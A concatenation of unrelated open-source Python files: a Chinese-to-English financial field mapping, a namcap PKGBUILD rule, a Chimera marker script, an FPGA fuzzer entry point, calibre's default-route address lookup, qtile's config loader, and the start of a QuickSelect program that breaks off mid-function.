'267受限流通A股(股)': 'limitedCirculationAShares',
'268一般风险准备(金融类)': 'generalRiskPreparation',
'269其他综合收益(利润表)': 'otherComprehensiveIncome',
'270综合收益总额(利润表)': 'totalComprehensiveIncome',
'271归属于母公司股东权益(资产负债表)': 'shareholdersOwnershipOfAParentCompany ',
'272银行机构数(家)(机构持股)': 'bankInstutionNumber',
'273银行持股量(股)(机构持股)': 'bankInstutionShareholding',
'274一般法人机构数(家)(机构持股)': 'corporationNumber',
'275一般法人持股量(股)(机构持股)': 'corporationShareholding',
'276近一年净利润(元)': 'netProfitLastYear',
'277信托机构数(家)(机构持股)': 'trustInstitutionNumber',
'278信托持股量(股)(机构持股)': 'trustInstitutionShareholding',
'279特殊法人机构数(家)(机构持股)': 'specialCorporationNumber',
'280特殊法人持股量(股)(机构持股)': 'specialCorporationShareholding',
'281加权净资产收益率(每股指标)': 'weightedROE',
'282扣非每股收益(单季度财务指标)': 'nonEPSSingle',
'283最近一年营业收入()': 'lastYearOperatingIncome',
'284国家队持股数量(万股)': 'nationalTeamShareholding',
# [注:本指标统计包含汇金公司、证金公司、外汇管理局旗下投资平台、国家队基金、国开、养老金以及中科汇通等国家队机构持股数量]
'285业绩预告-本期净利润同比增幅下限%': 'PF_theLowerLimitoftheYearonyearGrowthofNetProfitForThePeriod',
# [注:指标285至294展示未来一个报告期的数据。例,3月31日至6月29日这段时间内展示的是中报的数据;如果最新的财务报告后面有多个报告期的业绩预告/快报,只能展示最新的财务报告后面的一个报告期的业绩预告/快报]
'286业绩预告-本期净利润同比增幅上限%': 'PF_theHigherLimitoftheYearonyearGrowthofNetProfitForThePeriod',
'287业绩快报-归母净利润': 'PE_returningtotheMothersNetProfit',
'288业绩快报-扣非净利润': 'PE_Non-netProfit',
'289业绩快报-总资产': 'PE_TotalAssets',
'290业绩快报-净资产': 'PE_NetAssets',
'291业绩快报-每股收益': 'PE_EPS',
'292业绩快报-摊薄净资产收益率': 'PE_DilutedROA',
'293业绩快报-加权净资产收益率': 'PE_WeightedROE',
'294业绩快报-每股净资产': 'PE_NetAssetsperShare',
'295应付票据及应付账款(资产负债表)': 'BS_NotesPayableandAccountsPayable',
'296应收票据及应收账款(资产负债表)': 'BS_NotesReceivableandAccountsReceivable',
'297递延收益(资产负债表)': 'BS_DeferredIncome',
'298其他综合收益(资产负债表)': 'BS_OtherComprehensiveIncome',
'299其他权益工具(资产负债表)': 'BS_OtherEquityInstruments',
'300其他收益(利润表)': 'IS_OtherIncome',
'301资产处置收益(利润表)': 'IS_AssetDisposalIncome',
'302持续经营净利润(利润表)': 'IS_NetProfitforContinuingOperations',
'303终止经营净利润(利润表)': 'IS_NetProfitforTerminationOperations',
'304研发费用(利润表)': 'IS_R&DExpense',
'305其中:利息费用(利润表-财务费用)': 'IS_InterestExpense',
'306其中:利息收入(利润表-财务费用)': 'IS_InterestIncome',
'307近一年经营活动现金流净额': 'netCashFlowfromOperatingActivitiesinthepastyear',
'308近一年归母净利润': 'Net_profit_attributable to the mother in the recent year',
'309近一年扣非净利润': 'Nearly_one_year_net profit after deduction',
'310近一年现金净流量': 'Net cash flow in the past year',
'311基本每股收益(单季度)': 'Basic earnings per share (single quarter)',
'312营业总收入(单季度)': 'Total operating income (single quarter) ',
'313业绩预告公告日期': 'Announcement date of earnings forecast',
'314财报公告日期': 'earnings announcement date',
'315业绩快报公告日期': 'Earnings Update Announcement Date',
'316近一年投资活动现金流净额': 'Net cash flow from investing activities in the past year ',
'317业绩预告-本期净利润下限': 'Forecast of performance',
'318业绩预告-本期净利润上限': 'Forecast of Results - Current Period Net Income Cap',
'319营业总收入TTM': 'Total Operating Income TTM',
'320员工总数(人)': 'Total number of employees (people)',
'321每股企业自由现金流': 'Corporate Free Cash Flow per Share',
'322每股股东自由现金流': 'Free cash flow per share for shareholders',
'323备用323': 'unknown323',
'324备用324': 'unknown324',
'325备用325': 'unknown325',
'326备用326': 'unknown326',
'327备用327': 'unknown327',
'328备用328': 'unknown328',
'329备用329': 'unknown329',
'330备用330': 'unknown330',
'331备用331': 'unknown331',
'332备用332': 'unknown332',
'333备用333': 'unknown333',
'334备用334': 'unknown334',
'335备用335': 'unknown335',
'336备用336': 'unknown336',
'337备用337': 'unknown337',
'338备用338': 'unknown338',
'339备用339': 'unknown339',
'340备用340': 'unknown340',
'341备用341': 'unknown341',
'342备用342': 'unknown342',
'343备用343': 'unknown343',
'344备用344': 'unknown344',
'345备用345': 'unknown345',
'346备用346': 'unknown346',
'347备用347': 'unknown347',
'348备用348': 'unknown348',
'349备用349': 'unknown349',
'350备用350': 'unknown350',
'351备用351': 'unknown351',
'352备用352': 'unknown352',
'353备用353': 'unknown353',
'354备用354': 'unknown354',
'355备用355': 'unknown355',
'356备用356': 'unknown356',
'357备用357': 'unknown357',
'358备用358': 'unknown358',
'359备用359': 'unknown359',
'360备用360': 'unknown360',
'361备用361': 'unknown361',
'362备用362': 'unknown362',
'363备用363': 'unknown363',
'364备用364': 'unknown364',
'365备用365': 'unknown365',
'366备用366': 'unknown366',
'367备用367': 'unknown367',
'368备用368': 'unknown368',
'369备用369': 'unknown369',
'370备用370': 'unknown370',
'371备用371': 'unknown371',
'372备用372': 'unknown372',
'373备用373': 'unknown373',
'374备用374': 'unknown374',
'375备用375': 'unknown375',
'376备用376': 'unknown376',
'377备用377': 'unknown377',
'378备用378': 'unknown378',
'379备用379': 'unknown379',
'380备用380': 'unknown380',
'381备用381': 'unknown381',
'382备用382': 'unknown382',
'383备用383': 'unknown383',
'384备用384': 'unknown384',
'385备用385': 'unknown385',
'386备用386': 'unknown386',
'387备用387': 'unknown387',
'388备用388': 'unknown388',
'389备用389': 'unknown389',
'390备用390': 'unknown390',
'391备用391': 'unknown391',
'392备用392': 'unknown392',
'393备用393': 'unknown393',
'394备用394': 'unknown394',
'395备用395': 'unknown395',
'396备用396': 'unknown396',
'397备用397': 'unknown397',
'398备用398': 'unknown398',
'399备用399': 'unknown399',
'400备用400': 'unknown400',
# 资产负债表新增指标---
'401专项储备': 'Special reserve',
'402结算备付金': 'Settlement provision',
'403拆出资金': 'Funds removed',
'404发放贷款及垫款': 'Loans and advances granted',
'405衍生金融资产': 'Derivative financial assets',
'406应收保费': 'Premium receivable',
'407应收分保账款': 'Sub-insurance receivables',
'408应收分保合同准备金': 'Provision for sub-insurance contracts receivable',
'409买入返售金融资产': 'Buy-back financial assets',
'410划分为持有待售的资产': 'Assets classified as held for sale',
'411发放贷款及垫款': 'Loans and advances granted',
'412向中央银行借款': 'Borrowings from central banks',
'413吸收存款及同业存放': 'Absorption of deposits and interbank deposits',
'414拆入资金': 'Funds borrowed',
'415衍生金融负债': 'Derivative financial liabilities',
'416卖出回购金融资产款': 'Sale of repurchase financial assets',
'417应付手续费及佣金': 'Fees and commissions payable',
'418应付分保账款': 'Payables to sub-insurance accounts',
'419保险合同准备金': 'Provision for insurance contracts',
'420代理买卖证券款': 'Agency securities trading',
'421代理承销证券款': 'Agency underwriting of securities',
'422划分为持有待售的负债': 'Liabilities classified as held for sale',
'423预计负债': 'Projected liabilities',
'424递延收益': 'Deferred income',
'425其中:优先股': 'Deferred incomeOf which:Preferred stock',
'426永续债非流动负债科目': 'Perpetual bonds',
'427长期应付职工薪酬': 'Long-term employee compensation payable',
'428其中:优先股': 'Long-term employee compensation payable Of which:Preferred shares',
'429永续债所有者权益科目': 'Perpetual debentures Owners equity account',
'430债权投资': 'Debt investments',
'431其他债权投资': 'Other debt investments',
'432其他权益工具投资': 'Investment in other equity instruments',
'433其他非流动金融资产': 'Other non-current financial assets',
'434合同负债': 'Contract liabilities',
'435合同资产': 'Contract assets',
'436其他资产': 'Other assets',
'437应收款项融资': 'Financing of receivables',
'438使用权资产': 'Right-of-use assets',
'439租赁负债': 'Lease liabilities',
'440备用440': 'unknown440',
'441备用441': 'unknown441',
'442备用442': 'unknown442',
'443备用443': 'unknown443',
'444备用444': 'unknown444',
'445备用445': 'unknown445',
'446备用446': 'unknown446',
'447备用447': 'unknown447',
'448备用448': 'unknown448',
'449备用449': 'unknown449',
'450备用450': 'unknown450',
'451备用451': 'unknown451',
'452备用452': 'unknown452',
'453备用453': 'unknown453',
'454备用454': 'unknown454',
'455备用455': 'unknown455',
'456备用456': 'unknown456',
'457备用457': 'unknown457',
'458备用458': 'unknown458',
'459备用459': 'unknown459',
'460备用460': 'unknown460',
'461备用461': 'unknown461',
'462备用462': 'unknown462',
'463备用463': 'unknown463',
'464备用464': 'unknown464',
'465备用465': 'unknown465',
'466备用466': 'unknown466',
'467备用467': 'unknown467',
'468备用468': 'unknown468',
'469备用469': 'unknown469',
'470备用470': 'unknown470',
'471备用471': 'unknown471',
'472备用472': 'unknown472',
'473备用473': 'unknown473',
'474备用474': 'unknown474',
'475备用475': 'unknown475',
'476备用476': 'unknown476',
'477备用477': 'unknown477',
'478备用478': 'unknown478',
'479备用479': 'unknown479',
'480备用480': 'unknown480',
'481备用481': 'unknown481',
'482备用482': 'unknown482',
'483备用483': 'unknown483',
'484备用484': 'unknown484',
'485备用485': 'unknown485',
'486备用486': 'unknown486',
'487备用487': 'unknown487',
'488备用488': 'unknown488',
'489备用489': 'unknown489',
'490备用490': 'unknown490',
'491备用491': 'unknown491',
'492备用492': 'unknown492',
'493备用493': 'unknown493',
'494备用494': 'unknown494',
'495备用495': 'unknown495',
'496备用496': 'unknown496',
'497备用497': 'unknown497',
'498备用498': 'unknown498',
'499备用499': 'unknown499',
'500备用500': 'unknown500',
'501稀释每股收益': 'Diluted earnings per share',
'502营业总收入': "Total operating income",
'503汇兑收益': 'Foreign exchange gain',
'504其中:归属于母公司综合收益': 'Comprehensive income attributable to parent company',
'505其中:归属于少数股东综合收益': 'Comprehensive income attributable to minority shareholders',
'506利息收入': 'Interest income',
'507已赚保费': 'Premiums earned',
'508手续费及佣金收入': 'Fee and commission income',
'509利息支出': 'Interest expense',
'510手续费及佣金支出': 'Handling and commission expenses',
'511退保金': 'Surrender premiums',
'512赔付支出净额': 'Net payout expenses',
'513提取保险合同准备金净额': 'Net withdrawal of insurance contract reserve',
'514保单红利支出': 'Policy dividend expense',
'515分保费用': 'Ceding expenses',
'516其中:非流动资产处置利得': 'Gain on disposal of non-current assets',
'517信用减值损失': 'Credit impairment loss',
'518净敞口套期收益': 'Net exposure hedging gain',
'519营业总成本': 'Total operating costs',
'520信用减值损失': 'Credit impairment loss',
'521资产减值损失': 'Impairment loss on assets',
'522备用522': 'unknown522',
'523备用523': 'unknown523',
'524备用524': 'unknown524',
'525备用525': 'unknown525',
'526备用526': 'unknown526',
'527备用527': 'unknown527',
'528备用528': 'unknown528',
'529备用529': 'unknown529',
'530备用530': 'unknown530',
'531备用531': 'unknown531',
'532备用532': 'unknown532',
'533备用533': 'unknown533',
'534备用534': 'unknown534',
'535备用535': 'unknown535',
'536备用536': 'unknown536',
'537备用537': 'unknown537',
'538备用538': 'unknown538',
'539备用539': 'unknown539',
'540备用540': 'unknown540',
'541备用541': 'unknown541',
'542备用542': 'unknown542',
'543备用543': 'unknown543',
'544备用544': 'unknown544',
'545备用545': 'unknown545',
'546备用546': 'unknown546',
'547备用547': 'unknown547',
'548备用548': 'unknown548',
'549备用549': 'unknown549',
'550备用550': 'unknown550',
'551备用551': 'unknown551',
'552备用552': 'unknown552',
'553备用553': 'unknown553',
'554备用554': 'unknown554',
'555备用555': 'unknown555',
'556备用556': 'unknown556',
'557备用557': 'unknown557',
'558备用558': 'unknown558',
'559备用559': 'unknown559',
'560备用560': 'unknown560',
'561:其他原因对现金的影响2': 'Add:Effect of other causes on cash2',
'562客户存款和同业存放款项净增加额': 'Net increase in customer deposits and interbank deposits',
'563向中央银行借款净增加额': 'Net increase in borrowings from central banks',
'564向其他金融机构拆入资金净增加额': 'Net increase in funds borrowed from other financial institutions',
'565收到原保险合同保费取得的现金': 'Cash received from premiums on original insurance contracts',
'566收到再保险业务现金净额': 'Net cash received from reinsurance business',
'567保户储金及投资款净增加额': 'Net increase in policyholders deposits and investment funds',
'568处置以公允价值计量且其变动计入当期损益的金融资产净增加额': 'Net increase in disposal of financial assets at fair value through profit or loss',
'569收取利息、手续费及佣金的现金': 'Cash received from interest, fees and commissions',
'570拆入资金净增加额': 'Net increase in funds transferred in ',
'571回购业务资金净增加额': 'Net increase in funds from repo business',
'572客户贷款及垫款净增加额': 'Net increase in loans and advances to customers',
'573存放中央银行和同业款项净增加额': 'Net increase in deposits with central banks and interbank',
'574支付原保险合同赔付款项的现金': 'Cash paid for claims on original insurance contracts',
'575支付利息、手续费及佣金的现金': 'Cash paid for interest, fees and commissions',
'576支付保单红利的现金': 'Cash paid for policy dividends',
'577其中:子公司吸收少数股东投资收到的现金': 'cash received from minority shareholders investment in subsidiaries',
'578其中:子公司支付给少数股东的股利利润': 'Dividends and profits paid by subsidiaries to minority shareholders',
'579投资性房地产的折旧及摊销': 'Depreciation and amortization of investment properties',
'580信用减值损失': 'Credit impairment loss'
}
| yutiansut/QUANTAXIS | QUANTAXIS/QAData/financial_mean.py | Python | mit | 36,309 |
#
# namcap rules - sfurl
# Copyright (C) 2004-2009 Ben Mazer <ben@benmazer.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import re
from Namcap.ruleclass import *
class package(PkgbuildRule):
    """Namcap rule flagging SourceForge download URLs that pin a mirror."""
    name = "sfurl"
    description = "Checks for proper sourceforge URLs"

    def analyze(self, pkginfo, tar):
        """Scan the PKGBUILD source array for bad SourceForge URLs.

        Appends a warning tuple for each source entry that either
        hardcodes a specific mirror host (e.g. heanet.dl.sourceforge.net)
        or uses the deprecated dl.sourceforge.net redirector.
        """
        if 'source' in pkginfo:
            for source in pkginfo["source"]:
                # Raw strings keep `\w` a regex escape (a SyntaxWarning, and
                # eventually an error, in plain strings on modern Python);
                # dots are escaped so e.g. "dlXsourceforge" no longer matches.
                if re.match(r'(http://|ftp://)\w+\.dl\.(sourceforge|sf)\.net', source):
                    self.warnings.append(("specific-sourceforge-mirror", ()))
                if re.match(r'(http://|ftp://)dl\.(sourceforge|sf)\.net', source):
                    self.warnings.append(("using-dl-sourceforge", ()))
# vim: set ts=4 sw=4 noet:
| anatol/namcap | Namcap/rules/sfurl.py | Python | gpl-2.0 | 1,348 |
# Generated UCSF Chimera script: place one sphere marker per model particle.
# The original emitted an identical 5-line stanza for each of the 71
# particles; the stanzas are folded into a data table driven by one loop.
import _surface
import chimera
try:
    import chimera.runCommand
except ImportError:
    pass
from VolumePath import markerset as ms
try:
    # Newer VolumePath exposes Marker_Set directly.
    from VolumePath import Marker_Set, Link
    new_marker_set = Marker_Set
except ImportError:
    # Older VolumePath: marker sets are created through the dialog.
    from VolumePath import volume_path_dialog
    d = volume_path_dialog(True)
    new_marker_set = d.new_marker_set
marker_sets = {}
surf_sets = {}

GREY = (0.7, 0.7, 0.7)
ORANGE = (1, 0.7, 0)
# One entry per particle, in particle order: (center xyz, colour, radius).
PARTICLES = [
    ((9661.74, 6510.06, 8334.98), GREY, 890.203),
    ((8172.17, 6939.27, 7094.67), GREY, 792.956),
    ((7514.32, 6168.44, 5626.51), GREY, 856.786),
    ((9092.57, 5230.04, 4177.09), GREY, 963.679),
    ((8745.86, 6074.21, 3523.05), GREY, 761.442),
    ((7165.18, 7724.48, 4084.38), GREY, 961.183),
    ((8246.24, 10417.5, 3680.61), GREY, 753.151),
    ((9136.84, 11096.5, 2886.49), ORANGE, 1098.07),
    ((5652.63, 9793.87, 5469.56), GREY, 1010.42),
    ((5673.29, 10038.9, 6543.67), ORANGE, 821.043),
    ((5871.74, 8467.28, 7421.64), GREY, 873.876),
    ((6217.57, 7158.24, 8911.98), GREY, 625.532),
    ((4692.41, 6812.6, 8240.75), GREY, 880.474),
    ((4025.88, 5645.2, 6934.89), GREY, 659.161),
    ((4621.92, 4570.73, 7922.58), GREY, 831.745),
    ((4507.82, 2923.97, 9830.72), GREY, 803.065),
    ((5097.04, 4550.86, 9359.33), GREY, 610.262),
    ((6024.53, 5806.87, 9296.76), GREY, 741.265),
    ((6995.84, 4767.27, 8752.82), GREY, 748.625),
    ((5510.04, 4428.3, 8876.8), GREY, 677.181),
    ((4694.84, 5514.64, 7708.26), GREY, 616.015),
    ((5638.44, 5177.54, 7891.7), GREY, 653.154),
    ((5156.54, 6084.88, 8745.39), GREY, 595.33),
    ((5923.88, 7005.17, 8837.07), GREY, 627.901),
    ((6410.7, 6081.58, 7580.41), GREY, 663.941),
    ((5235.86, 5293.96, 7603.87), GREY, 663.899),
    ((5304.5, 4901.89, 8988.58), GREY, 644.694),
    ((4263.21, 5754.37, 8348.04), GREY, 896.802),
    ((4870.84, 4604.77, 7808.76), GREY, 576.38),
    ((3865.44, 4119.95, 7206.64), GREY, 635.092),
    ((4840.02, 5330.07, 6865.76), GREY, 651.505),
    ((5485.7, 6029.85, 5658.37), GREY, 718.042),
    ((4891.75, 6539.86, 6957), GREY, 726.714),
    ((5232.65, 5807.76, 8197.38), GREY, 673.585),
    ((5824.18, 5848.85, 8884.05), GREY, 598.418),
    ((5230.41, 6717.68, 9996.71), GREY, 697.612),
    ((4479.11, 6912.39, 6996.33), GREY, 799.808),
    ((4211.7, 8873.75, 5724.08), GREY, 1132.58),
    ((3705.9, 8372.41, 5301.81), GREY, 1011.94),
    ((2828.31, 8572.74, 4102.1), GREY, 782.592),
    ((2636.82, 10355, 4249.58), GREY, 856.575),
    ((2444.39, 11333.3, 4461.4), ORANGE, 706.579),
    ((2963.15, 10357.9, 4221.01), GREY, 1015.96),
    ((3510.15, 7766.31, 3156.33), GREY, 1205.72),
    ((2766.72, 5976.98, 2313.02), GREY, 841.939),
    ((4200.28, 6571.28, 2101.41), ORANGE, 806.999),
    ((4042.15, 6204.4, 1642.51), GREY, 958.856),
    ((5084.42, 4620.36, 1342.83), GREY, 952.892),
    ((4632.97, 3973.45, 898.818), GREY, 809.284),
    ((4110.65, 4682.32, 826.943), GREY, 709.159),
    ((4416.16, 3277.34, 1846), GREY, 859.832),
    ((5399.69, 3165.07, 3287.79), GREY, 800.866),
    ((3611.81, 2979.39, 3437.4), GREY, 949.508),
    ((2517.55, 4315.35, 4211.27), GREY, 891.98),
    ((4402.1, 4157.94, 4876.63), GREY, 890.034),
    ((4700.22, 3394.99, 3359.54), GREY, 804.165),
    ((5427.31, 2372.95, 4222.7), GREY, 826.796),
    ((3626.5, 1687.89, 4025.98), GREY, 1085.8),
    ((3848.24, 4107.59, 4836.74), GREY, 906.997),
    ((3250.23, 2911.49, 3793.8), GREY, 708.694),
    ((3968.91, 2921.79, 2577.87), GREY, 780.223),
    ((4225.56, 2865.53, 2425.5), GREY, 757.424),
    ((5492.47, 2931.67, 1416.64), GREY, 817.574),
    ((5296.32, 3257.55, -202.453), GREY, 782.423),
    ((5712.92, 4129.29, 1315.28), GREY, 906.404),
    ((3950.9, 3652.02, 1475.87), GREY, 818.463),
    ((5427.49, 3550.32, 2015.8), GREY, 759.539),
    ((6166.49, 4537.85, 638.288), GREY, 1088.59),
    ((4548.93, 3360.53, 106.679), GREY, 822.312),
    ((4332.63, 4191.46, 213.715), GREY, 749.81),
    ((5028.96, 3412.62, 398.975), GREY, 764.488),
]

for index, (center, colour, radius) in enumerate(PARTICLES):
    set_name = "particle_%d geometry" % index
    if set_name not in marker_sets:
        marker_sets[set_name] = new_marker_set(set_name)
    s = marker_sets[set_name]
    mark = s.place_marker(center, colour, radius)

for k in surf_sets.keys():
    chimera.openModels.add([surf_sets[k]])
| batxes/4Cin | SHH_INV_models/SHH_INV_models_final_output_0.2_-0.1_10000/SHH_INV_models38317.py | Python | gpl-3.0 | 17,570 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020-2022 F4PGA Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
from utils.spec import slice_logic
from utils.spec import slice_carry
from utils.spec import slice_memory
from utils.spec import flipflops
from utils.spec import memory
from utils import spec_top
# Table of (specification module, count) pairs consumed by spec_top.spec_top.
# NOTE(review): the count is presumably the number of specimens generated per
# spec module -- confirm against utils.spec_top.
SPECS = (
    (slice_memory, 10),
    (slice_logic, 10),
    (memory, 10),
    (flipflops, 10),
    (slice_carry, 10),
)
def main():
    """Run the spec_top driver over every entry in SPECS."""
    spec_top.spec_top(SPECS)
# Allow direct execution as a script.
if __name__ == "__main__":
    main()
| SymbiFlow/prjuray | fuzzers/014-cle-spec/top.py | Python | isc | 1,073 |
#!/usr/bin/env python2
# vim:fileencoding=utf-8
# License: GPLv3 Copyright: 2016, Kovid Goyal <kovid at kovidgoyal.net>
from __future__ import (unicode_literals, division, absolute_import,
print_function)
import subprocess, re
from calibre.constants import iswindows, isosx
def get_address_of_default_gateway(family='AF_INET'):
    """Return the default gateway's IP address as a unicode string.

    :param family: name of a :mod:`netifaces` address-family constant,
        e.g. ``'AF_INET'`` or ``'AF_INET6'``.
    """
    import netifaces
    af = getattr(netifaces, family)
    addr = netifaces.gateways()['default'][af][0]
    return addr.decode('ascii') if isinstance(addr, bytes) else addr
def get_addresses_for_interface(name, family='AF_INET'):
    """Yield the addresses assigned to the named interface.

    Point-to-point addresses (entries without a ``broadcast`` key) are
    skipped; byte strings are decoded to unicode.
    """
    import netifaces
    af = getattr(netifaces, family)
    for info in netifaces.ifaddresses(name)[af]:
        if not info.get('broadcast'):
            continue  # point-to-point address, ignore
        address = info.get('addr')
        if not address:
            continue
        if isinstance(address, bytes):
            address = address.decode('ascii')
        yield address
if iswindows:
    # Windows has two strategies; the IP Helper API variant below is the
    # one actually bound to get_default_route_src_address.
    def get_default_route_src_address_external():
        # Use -6 for IPv6 addresses
        # Parses the text output of `route print`.  creationflags=0x08 is
        # DETACHED_PROCESS, which keeps the helper from attaching to a
        # console.
        raw = subprocess.check_output('route -4 print 0.0.0.0'.split(), creationflags=0x08).decode('utf-8', 'replace')
        in_table = False
        default_gateway = get_address_of_default_gateway()
        for line in raw.splitlines():
            parts = line.strip().split()
            if in_table:
                # NOTE(review): if a table row has neither 5 nor 6 columns,
                # `gateway` keeps its value from a previous row (or is
                # unbound on the first row) -- confirm route output always
                # matches one of the two shapes.
                if len(parts) == 6:
                    network, destination, netmask, gateway, interface, metric = parts
                elif len(parts) == 5:
                    destination, netmask, gateway, interface, metric = parts
                if gateway == default_gateway:
                    return interface
            else:
                # The header row marks the start of the routing table.
                if parts == 'Network Destination Netmask Gateway Interface Metric'.split():
                    in_table = True
    def get_default_route_src_address_api():
        # Walk the routing table via the Windows IP Helper API and return
        # the first usable address of the interface owning the default
        # (0.0.0.0) route.
        from calibre.utils.iphlpapi import routes
        for route in routes():
            if route.interface and route.destination == '0.0.0.0':
                for addr in get_addresses_for_interface(route.interface):
                    return addr
    get_default_route_src_address = get_default_route_src_address_api
elif isosx:
    def get_default_route_src_address():
        # Use -inet6 for IPv6
        # Ask the BSD route utility which interface serves the default
        # route, then report that interface's first address.
        raw = subprocess.check_output('route -n get -inet default'.split()).decode('utf-8')
        m = re.search(r'^\s*interface:\s*(\S+)\s*$', raw, flags=re.MULTILINE)
        if m is not None:
            interface = m.group(1)
            for addr in get_addresses_for_interface(interface):
                return addr
else:
    def get_default_route_src_address():
        # Use /proc/net/ipv6_route for IPv6 addresses
        # Linux: a destination of 00000000 in /proc/net/route marks the
        # default route; column 0 of that row is the interface name.
        raw = open('/proc/net/route', 'rb').read().decode('utf-8')
        for line in raw.splitlines():
            parts = line.split()
            if len(parts) > 1 and parts[1] == '00000000':
                for addr in get_addresses_for_interface(parts[0]):
                    return addr
# Print the detected source address when run as a script.
if __name__ == '__main__':
    print(get_default_route_src_address())
| hazrpg/calibre | src/calibre/utils/ip_routing.py | Python | gpl-3.0 | 3,044 |
# coding: utf-8
#
# Copyright (c) 2008, Aldo Cortesi <aldo@corte.si>
# Copyright (c) 2011, Andrew Grigorev <andrew@ei-grad.ru>
#
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import traceback
class ConfigError(Exception):
    """Raised when the user's configuration file cannot be loaded."""
class File(object):
    """Loads a user config module and exposes its settings as attributes.

    Any option missing from the user's config (or the whole config, when
    it could not be loaded) falls back to the value defined in
    ``resources/default_config.py``.
    """
    def __init__(self, fname=None, is_restart=False):
        # fname: path to the config module; defaults to
        #   $XDG_CONFIG_HOME/qtile/config.py (or ~/.config/qtile/config.py
        #   when XDG_CONFIG_HOME is unset).  The literal "default" loads
        #   the bundled default config.
        # is_restart: when True a broken user config is tolerated so a
        #   restart does not lose the user's running apps.
        if not fname:
            config_directory = os.path.expandvars('$XDG_CONFIG_HOME')
            if config_directory == '$XDG_CONFIG_HOME':
                # if variable wasn't set
                config_directory = os.path.expanduser("~/.config")
            fname = os.path.join(config_directory, "qtile", "config.py")
        # We delay importing here to avoid a circular import issue when
        # testing.
        from .resources import default_config
        if fname == "default":
            config = default_config
        elif os.path.isfile(fname):
            try:
                # NOTE(review): the inserted sys.path entry is never
                # removed, and a basename containing extra dots would
                # confuse __import__ -- verify this is acceptable.
                sys.path.insert(0, os.path.dirname(fname))
                config = __import__(os.path.basename(fname)[:-3])
            except Exception as v:
                # On restart, user potentially has some windows open, but they
                # screwed up their config. So as not to lose their apps, we
                # just load the default config here.
                if is_restart:
                    traceback.print_exc()
                    config = None
                else:
                    tb = traceback.format_exc()
                    raise ConfigError(str(v) + "\n\n" + tb)
        else:
            # No config file present at all: fall back to defaults.
            config = None
        # if you add something here, be sure to add a reasonable default value
        # to resources/default_config.py
        config_options = [
            "keys",
            "mouse",
            "groups",
            "dgroups_key_binder",
            "dgroups_app_rules",
            "follow_mouse_focus",
            "cursor_warp",
            "layouts",
            "floating_layout",
            "screens",
            "main",
            "auto_fullscreen",
            "widget_defaults",
            "bring_front_click",
            "wmname",
        ]
        # Copy each option from the user's config, falling back to the
        # default config; never clobber an attribute that already exists.
        for option in config_options:
            if hasattr(config, option):
                v = getattr(config, option)
            else:
                v = getattr(default_config, option)
            if not hasattr(self, option):
                setattr(self, option, v)
| kiniou/qtile | libqtile/confreader.py | Python | mit | 3,436 |
#!/usr/bin/python
######################################################################
# Autor: Andrés Herrera Poyatos
# Universidad de Granada, January, 2015
# Sorting Algorithm: QuickSelect
#######################################################################
# This program read an integer array from a file a execute the QuickSelect
# algorithm on it to find the ith order statistic element given as an argument.
# Several variants of QuickSelect are given such as Lomuto or Hoare partition algorithm
# or some pivot selection methods. Choose the one you like but the best
# one is the implemented by defect.
#
# This algorithm is based on QuickSort. With a similar analisys than the one done
# for QuickSort you can see it is lineal in average but it has a quadratic worst case.
import sys # For arguments (syc.argv) and exit (syc.exit())
import time # To time the program
from random import randrange # Random integer generator
# Swap two elements in the array
def swap(array, i, j):
    """Exchange the elements of *array* at positions *i* and *j* in place."""
    array[i], array[j] = array[j], array[i]
# Select a random pivot for the subarray [begin,end[ and put it in the
# position begin. It's value is returned.
def selectRandomPivot(array, begin, end):
    """Pick a uniformly random pivot from array[begin:end], move it to
    position begin and return its value."""
    chosen = randrange(begin, end)
    array[begin], array[chosen] = array[chosen], array[begin]
    return array[begin]
# Select a pivot for the subarray [begin,end[ and put it in the
# position begin. The pivot is selected as the median of 3 elements.
# It's value is returned.
def selectPivotMedian(array, begin, end):
    """Median-of-three pivot selection for array[begin:end].

    The median of the first, middle and last elements is moved to
    position begin and its value is returned.
    """
    last = end - 1
    middle = (begin + last) // 2
    first_v, mid_v, last_v = array[begin], array[middle], array[last]
    if first_v <= last_v:
        if first_v >= mid_v:
            pivot_index = begin
        elif mid_v <= last_v:
            pivot_index = middle
        else:
            pivot_index = last
    else:
        if first_v <= mid_v:
            pivot_index = begin
        elif mid_v >= last_v:
            pivot_index = middle
        else:
            pivot_index = last
    array[begin], array[pivot_index] = array[pivot_index], array[begin]
    return array[begin]
# Function that do a partition of the subarray [begin,end[.
# It uses the Lomuto algorithm. The expected total number
# of swaps is n/2 - 1/2. It perfoms poorly when there are
# repeted elements in the array since it does not divide it
# properly.
def partitionLomuto(array, begin, end):
